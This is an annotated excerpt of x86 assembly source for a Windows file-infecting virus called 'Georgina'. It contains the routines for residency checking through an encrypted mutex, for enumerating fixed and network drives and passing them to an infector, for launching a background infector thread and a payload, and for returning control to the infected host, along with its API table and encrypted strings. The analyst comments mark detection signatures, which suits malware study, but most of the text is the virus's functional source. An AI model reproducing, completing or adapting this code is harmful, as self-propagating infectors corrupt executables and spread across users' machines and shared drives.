popad
ret
CryptMutexName endp
;-----------------------------------------------------------------------
; CheckForCopies - residency check through a named mutex
; In:    ebp = delta base (every data item and API slot is reached as
;        [ebp+offset ...] / [ebp+_Api])
; Out:   eax = 0          mutex did not exist and has just been created
;        eax = 0FFFFFFFFh mutex already existed (another copy is resident)
;        eax = 0FFFFFFFEh mutex absent but CreateMutexA failed
; Clobb: eax, ebx, flags, plus whatever CryptMutexName clobbers (only its
;        tail is visible in this excerpt)
; Analyst note: the mutex name is decrypted in place immediately before use
; and CryptMutexName is called again on every exit path, presumably to
; re-encrypt it (same routine, body not shown).  On the success path the
; created handle is deliberately never closed, so the named mutex exists for
; the lifetime of the process - the decrypted name is the primary residency
; artifact to look for on a live system.
;-----------------------------------------------------------------------
CheckForCopies proc ; checks whether other resident copy of virus is running
call CryptMutexName ; decrypts mutex name
lea ebx,[ebp+offset szMutexName] ; mutex is used to determine the presence of other copy
push ebx ; lpName
push 0h ; bInheritHandle = FALSE
push 1F0001h ; 1F0001h = MUTEX_ALL_ACCESS
call [ebp+_OpenMutexA] ; OpenMutexA returns a handle to the mutex if it exists already
cmp eax,0h ; if there's no mutex, try to create it...
jne @_mutex_exists
push ebx ; creating mutex... lpName (still in ebx)
push 1h ; bInitialOwner = TRUE
push 0h ; lpMutexAttributes = NULL
call [ebp+_CreateMutexA]
cmp eax,0h
je @_no_mutex_created
jne @_mutex_created ; always taken here: ZF is already known clear after the je above
@_no_mutex_created:
call CryptMutexName ; re-encrypt the name before leaving (presumed; see header)
mov eax,0FFFFFFFEh ; error, no mutex exists and can't be created
ret
@_mutex_exists:
push eax ; IMPORTANT!!! to close opened mutex handle in order for system to kill the
call [ebp+_CloseHandle] ; the mutex which is always checked as a residency flag!
call CryptMutexName
mov eax,0FFFFFFFFh ; error, mutex exists and can't be created
ret
@_mutex_created:
call CryptMutexName ; note: the new mutex handle is intentionally kept open
mov eax,0h ; success, there was no mutex in the system and it has been just created
ret
CheckForCopies endp
;-----------------------------------------------------------------------
; StartInfection - thread entry point of the infector thread
; In:    lpParameter (thread argument) = pointer to _EBP, which holds the
;        delta base; recovered through ebp below
; Out:   nothing meaningful (pushad/popad restores every register)
; Calls: GetLogicalDrives, GetDriveTypeA, InfectPath (InfectPath is not
;        in this excerpt)
; Behaviour visible here: every drive whose bit is set in the
; GetLogicalDrives mask is probed with GetDriveTypeA; only DRIVE_FIXED (3)
; and DRIVE_REMOTE (4) drives are handed to InfectPath, i.e. mapped network
; shares are in scope - relevant for containment once this sample is found
; on a host.
;-----------------------------------------------------------------------
StartInfection proc
pushad
; Here we try to get parameter EBP passed to the new thread...
; NOTE(review): the thread parameter is read through ebp rather than esp,
; so this depends on the value ebp happens to hold when the OS starts the
; thread - undocumented and version-dependent; treat as fragile.
mov ebp,[ebp+0Ch] ; 0Ch = 12, 0Ch points to the first parameter in the stack in a new thread
mov ebp,[ebp] ; ebp = *(DWORD *)lpParameter = delta base stored in _EBP
call [ebp+_GetLogicalDrives] ; getting logical drives....
mov ebx,eax ; ebx = drive bitmask (bit n set => drive 'A'+n exists)
xor ecx,ecx ; ecx = drive index, 0..31
@DriveLoop:
push ecx ; and checking whether it's a HD or network drive...
mov edx,1h
shl edx,cl ; edx = 1 << ecx, the mask bit of this drive
push ebx ; ebx is destroyed by the 'and' below, keep a copy for the next iteration
and ebx,edx
cmp ebx,0h
je @_do_not_infect_disk ; no such drive letter
mov edx,65 ; ASCII for 'A'
add edx,ecx ; edx = 'A' + index
lea edi,[ebp+offset szDestDir]
mov [edi],dl ; patch the drive letter into the "c:\" template in place
push edi ; lpRootPathName
call [ebp+_GetDriveTypeA]
cmp eax,3h ; DRIVE_FIXED = 3, according to WinBase.h
je @_infect_disk
cmp eax,4h ; DRIVE_REMOTE = 4, according to WinBase.h
je @_infect_disk
jmp @_do_not_infect_disk ; any other drive type is skipped
@_infect_disk:
lea edi,[ebp+offset szDestDir]
call InfectPath ; edi = root path of the drive; InfectPath is outside this excerpt
@_do_not_infect_disk:
pop ebx
pop ecx
inc ecx
cmp ecx,32
jl @DriveLoop ; 32 possible drive letters
popad
ret
StartInfection endp
;-----------------------------------------------------------------------
; VirusMainThread - thread entry point of the virus's main thread
; In:    lpParameter = pointer to _EBP (delta base), recovered through ebp
; Out:   nothing (pushad/popad)
; Behaviour visible here:
;   1. polls CheckForCopies once per second until it returns 0, i.e. blocks
;      for as long as another copy holds the residency mutex (or while
;      CreateMutexA keeps failing);
;   2. then creates the infector thread (StartInfection) suspended, lowers
;      it to THREAD_PRIORITY_BELOW_NORMAL and resumes it;
;   3. then calls PayLoad (not in this excerpt) and returns.
; A CreateThread failure skips both the infector and the payload.
;-----------------------------------------------------------------------
VirusMainThread proc ;if no other copy of virus is running then spawns the infector and the payload
pushad
; Here we try to get parameter EBP passed to the new thread...
; NOTE(review): same ebp-based parameter recovery as in StartInfection -
; relies on the OS thread-start stub leaving a usable ebp; fragile.
mov ebp,[ebp+0Ch] ; 0Ch = 12, 0Ch points to the first parameter in the stack in a new thread
mov ebp,[ebp] ; ebp = delta base stored in _EBP
@MainLoop:
call CheckForCopies ; eax = 0 only when this instance now owns the mutex
cmp eax,0h
je @StartAllSubRoutines
push 1000 ; Sleeping 1 second(s) before performing next check of running copies
call [ebp+_Sleep]
jmp @MainLoop ; loops on both the "mutex exists" and the "cannot create" results
@StartAllSubRoutines:
; starting the low priority thread for infecting
; CreateThread(NULL, 0, StartInfection, &_EBP, CREATE_SUSPENDED, &ThreadID3)
lea ebx,[ebp+offset ThreadID3]
push ebx ; lpThreadId (ThreadID3 is also used by LaunchVirusMainThread, so it is overwritten here)
push CREATE_SUSPENDED ; 0h is when u need to run the thread immediately
lea ebx,[ebp+_EBP]
push ebx ; lpParameter = &_EBP
lea ebx,[ebp+offset StartInfection]
push ebx ; lpStartAddress
push 0h ; dwStackSize = default
push 0h ; lpThreadAttributes = NULL
call [ebp+_CreateThread]
cmp eax,0
je @VirusMainThreadEnd ; thread creation failed: no infector, no payload
push eax ; thread handle, consumed later by ResumeThread
push THREAD_PRIORITY_BELOW_NORMAL
push eax ; thread handle, consumed by SetThreadPriority
call [ebp+_SetThreadPriority]
call [ebp+_ResumeThread] ; the thread handle is never closed in this excerpt
; end of starting for the low priority thread for infecting
; starting the payload (it'll decide itself to continue or to stop)
call PayLoad ; outside this excerpt
; exiting our virus main thread, we consider all jobs are done and all the threads are launched!
@VirusMainThreadEnd:
popad
ret
VirusMainThread endp
;-----------------------------------------------------------------------
; LaunchVirusMainThread
;   = CreateThread(NULL, 0, VirusMainThread, &_EBP, 0, &ThreadID3)
; In:    ebp = delta base
; Out:   nothing; the thread handle returned in eax is discarded by popad
;        (never closed, never waited on), so the caller continues at once
;        while the virus keeps running in a background thread.
; Clobb: none visible to the caller (pushad/popad)
;-----------------------------------------------------------------------
LaunchVirusMainThread proc ; launching viri's main thread...
pushad
lea ebx,[ebp+offset ThreadID3]
push ebx ; lpThreadId
push 0h ; dwCreationFlags = 0, thread runs immediately
lea ebx,[ebp+_EBP]
push ebx ; lpParameter = &_EBP, read back by VirusMainThread
lea ebx,[ebp+offset VirusMainThread]
push ebx ; lpStartAddress
push 0h ; dwStackSize = default
push 0h ; lpThreadAttributes = NULL
call [ebp+_CreateThread]
popad
ret
LaunchVirusMainThread endp
; MainEnd - hand control back to the host program.
; eax = (_ImageBase - _EntryPoint) + OldEntryPoint, then jmp eax.
; NOTE(review): going by the existing comments, _ImageBase appears to hold
; the runtime address of the virus entry and _EntryPoint its RVA, so the
; subtraction yields the host's real image base; both are filled in
; elsewhere (not in this excerpt) - confirm against the entry stub.
MainEnd:
mov eax,dword ptr [ebp+_ImageBase] ; virus start point...
sub eax,dword ptr [ebp+_EntryPoint] ; subtracting virus entry-point, thus getting ImageBase
add eax,dword ptr [ebp+OldEntryPoint] ; adding old entry-point, thus jumping back to the host
jmp eax ; transfer to the host's original entry point; control does not come back here
; --- runtime state, filled in by code outside this excerpt ---
OldEntryPoint dd 0 ; host's old entry-point (read by MainEnd)
K32Address dd ? ; names suggest kernel32 base / export-table walking state - set elsewhere
K32ExportAddress dd ?
K32OrdinalsAddress dd ?
K32NumberOfExports dd ?
Counter dd 0h ; not referenced in this excerpt
;APIz that I need in my virus
; Runtime import table: each szXxx string is resolved (presumably through
; GetProcAddress - the resolver is not in this excerpt) into the matching
; _Xxx slot, which the code calls as [ebp+_Xxx].  Nothing here goes through
; the PE import table, so this run of plaintext API names, together with
; the "USER32.DLL" string, is a useful static signature for this family.
U32Address dd ?
szUser32Dll db "USER32.DLL",0h
szGetProcAddress db "GetProcAddress",0h
szGetModuleHandleA db "GetModuleHandleA",0h
szLoadLibraryA db "LoadLibraryA",0h
szGetFileAttributesA db "GetFileAttributesA",0h
szSetFileAttributesA db "SetFileAttributesA",0h
szCreateFileA db "CreateFileA",0h
szCreateFileMappingA db "CreateFileMappingA",0h
szMapViewOfFile db "MapViewOfFile",0h
szUnmapViewOfFile db "UnmapViewOfFile",0h
szFindFirstFileA db "FindFirstFileA",0h
szFindNextFileA db "FindNextFileA",0h
szFindClose db "FindClose",0h
szSetCurrentDirectoryA db "SetCurrentDirectoryA",0h
szGetLocalTime db "GetLocalTime",0h
szCreateThread db "CreateThread",0h
szSetThreadPriority db "SetThreadPriority",0h
szResumeThread db "ResumeThread",0h
szCreateMutexA db "CreateMutexA",0h
szOpenMutexA db "OpenMutexA",0h
szSleep db "Sleep",0h
szGetLogicalDrives db "GetLogicalDrives",0h
szGetDriveTypeA db "GetDriveTypeA",0h
szGetFileSize db "GetFileSize",0h
szCloseHandle db "CloseHandle",0h
szVirtualAlloc db "VirtualAlloc",0h
szMessageBoxA db "MessageBoxA",0h
szSetWindowTextA db "SetWindowTextA",0h
szGetTopWindow db "GetTopWindow",0h
szGetWindow db "GetWindow",0h
; resolved function pointers, one slot per name above, same order
_GetProcAddress dd ?
_GetModuleHandleA dd ?
_LoadLibraryA dd ?
_GetFileAttributesA dd ?
_SetFileAttributesA dd ?
_CreateFileA dd ?
_CreateFileMappingA dd ?
_MapViewOfFile dd ?
_UnmapViewOfFile dd ?
_FindFirstFileA dd ?
_FindNextFileA dd ?
_FindClose dd ?
_SetCurrentDirectoryA dd ?
_GetLocalTime dd ?
_CreateThread dd ?
_SetThreadPriority dd ?
_ResumeThread dd ?
_CreateMutexA dd ?
_OpenMutexA dd ?
_Sleep dd ?
_GetLogicalDrives dd ?
_GetDriveTypeA dd ?
_GetFileSize dd ?
_CloseHandle dd ?
_VirtualAlloc dd ?
_MessageBoxA dd ?
_SetWindowTextA dd ?
_GetTopWindow dd ?
_GetWindow dd ?
; --- infection state, path/mask strings and encrypted strings ---
; InfectionMark: 12-byte marker.  Its eight inner bytes recur verbatim inside
; szMutexName and szVirus below, so it is most likely the encoded form of
; szGeorgina padded on both sides (encoding routine not in this excerpt).
; Either way it is a stable 12-byte static signature.
InfectionMark db 08Ah,08Ah,0EDh,0CFh,0C5h,0D8h,0CDh,0C3h,0C4h,0CBh,08Ah,08Ah
FileHandle dd INVALID_HANDLE_VALUE
FileSize dd 0h
pMemory dd 0h
PEHdrOffset dd 0h
SectionsNum dd 0h
ImageSize dd 0h
dFileAlignment dd 0h
FileMappedHandle dd 0h
FileAttrib dd 0h
pVirtualMemory dd 0h
szDestDir db "c:\",0h ; root-path template; StartInfection overwrites the first byte with the drive letter
FindHandle dd 0h
FHandle dd 0h
FindResult WIN32_FIND_DATA ?
szEXEMask db "*.exe",0h ; presumably the file-search pattern used by InfectPath (not shown)
szGlobalMask db "*",0h
szUpDir db "..",0h
szGeorgina db "Georgina",0h
; encrypted mutex name, decrypted in place by CryptMutexName right before
; OpenMutexA/CreateMutexA in CheckForCopies; the decrypted name is the
; residency artifact worth recording
szMutexName db 0E1H,0EFH,0F8H,0E4H,0EFH,0E6H,0F5H,0E6H,0E5H ; encrypted mutex name
db 0FCH,0EFH,097H,0E3H,0F5H,0E6H,0C5H,0DCH,0CFH
db 0F5H,0F3H,0C5H,0DFH,0F5H,0EDH,0CFH,0C5H,0D8H
db 0CDH,0C3H,0C4H,0CBH,0F5H,098H,0E0H,0F0H,0EBH
db 09DH,09FH,09DH,0F5H,0E1H,0E3H,0F9H,0F9H,0EFH
db 0F9H,0AAH
MutexNameSize equ $-szMutexName ; size of mutex name
szVirus db 0FFH,08AH,0D8H,08AH,0C3H,0C4H,0CCH,0CFH,0C9H ; encrypted payload message
db 0DEH,0CFH,0CEH,08AH,0DDH,0C3H,0DEH,0C2H,08AH
db 0FDH,0C3H,0C4H,099H,098H,084H,0EDH,0CFH,0C5H
db 0D8H,0CDH,0C3H,0C4H,0CBH,08AH,0DCH,0C3H,0D8H
db 0DFH,0D9H,08BH,0A7H,0A0H,0EDH,0CFH,0C5H,0D8H
db 0CDH,0C3H,0C4H,0CBH,086H,0E3H,08AH,0C6H,0C5H
db 0DCH,0CFH,08AH,0DFH,08AH,0CBH,0C4H,0CEH,08AH
db 0DDH,0C3H,0C6H,0C6H,08AH,0C6H,0C5H,0DCH,0CFH
db 08AH,09EH,0CFH,0DCH,0CFH,0D8H,08BH,0A7H,0A0H
db 082H,0E9H,083H,09AH,0CEH,0CFH,0CEH,08AH,0C8H
db 0D3H,08AH,0E1H,0C3H,0E4H,0EFH,0FEH,0C3H,0E1H
db 086H,08AH,0E7H,0CBH,0D3H,08AH,098H,09AH,09AH
db 098H,0AAH
szVirusMsgSize equ $-szVirus ; size of payload message
Time SYSTEMTIME <0,0,0,0,0,0,0,0>
ThreadID1 dd 0h ; ThreadID1/ThreadID2 are not referenced in this excerpt
ThreadID2 dd 0h
ThreadID3 dd 0h ; lpThreadId for both CreateThread calls in this excerpt
_EBP dd ? ; delta base; its address is passed to new threads as lpParameter
_ImageBase dd ? ; see MainEnd
_EntryPoint dd ? ; see MainEnd
infect_section_end:
INFECTLENGTH equ (infect_section_end - infect_section) ; infect_section label is outside this excerpt
; CHARSNEW = 0E0000020h, i.e. CODE|EXECUTE|READ|WRITE section characteristics;
; presumably written into infected hosts (use not shown) - a writable,
; executable code section is itself a common PE-scanner heuristic
CHARSNEW equ 0E0000020h
; --- first-generation stub: what the original carrier executable runs.
; szMessage, szCaption and the MessageBox/ExitProcess prototypes are defined
; outside this excerpt; the calls use the assembler's extended call syntax
; with inline arguments. ---
_1st_generation:
call MessageBox,0,offset szMessage,offset szCaption,MB_OK
call ExitProcess,0
end main